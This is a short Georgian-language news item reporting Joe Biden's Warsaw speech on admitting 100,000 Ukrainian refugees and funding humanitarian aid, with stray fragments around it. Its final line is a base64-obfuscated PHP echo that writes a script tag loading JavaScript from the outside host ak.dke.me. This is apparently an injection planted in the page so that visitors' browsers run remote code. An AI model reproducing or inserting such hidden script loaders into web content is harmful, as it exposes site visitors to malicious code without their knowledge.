celsiusi
ავერსი შნაიდერი
აშშ მიიღებს 100 000 უკრაინელ ლტოლვილს. ჩვენ გამოვყოფთ 300 მილიონ დოლარს ჰუმანიტარული საჭიროებებისთვის, – განაცხადა აშშ-ის პრეზიდენტმა, ჯო ბაიდენმა ვარშავაში, პოლონეთის პრეზიდენტთან გამართული შეხვედრის შემდეგ, ქვეყნის დედაქალაქის ქუჩებში შეკრებილი მოქალაქეებისადმი სიტყვით გამოსვლისას.
 
„ყველა დემოკრატია მსოფლიოში ვალდებულია, დაეხმაროს უკრაინელ ლტოლვილებს. უკრაინელ ხალხს შეუძლია, ჰქონდეს აშშ-ის იმედი. მე რამდენიმე დღის წინ ვთქვი, რომ აშშ მიიღებს 100 000 უკრაინელ ლტოლვილს. ჩვენ გამოვყოფთ 300 მილიონ დოლარს ჰუმანიტარული საჭიროებებისთვის, რაც მოიცავს ათეულობით ათასს ტონა საკვებს, მედიკამენტებს და პირველადი დანიშნულების საგნებს. ბრიუსელში მე ვთქვი, რომ აშშ მზადაა, დამატებით ერთი მილიარდი დოლარის ჰუმანიტარული დახმარება გამოყოს. მსოფლიო სურსათის პროგრამის წარმომადგენლებმა გვითხრეს, რომ მიუხედავად მნიშვნელოვანი დაბრკოლებებისა, ჰუმანიტარული დახმარების ნაწილის ჩატანა უკრაინის დიდ ქალაქებში მაინც ხერხდება. მაგრამ არა მარიუპოლში, რადგან რუსული ძალები ამ დახმარების მიწოდებას ბლოკავენ. მიუხედავად ამისა, ჩვენ ძალისხმევას გავაგრძელებთ, რათა საჭირო ჰუმანიტარული დახმარება მიიღონ უკრაინაში მყოფმა და უკრაინიდან გასულმა მოქალაქეებმა“, – განაცხადა ჯო ბაიდენმა.
 
 
 
747
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");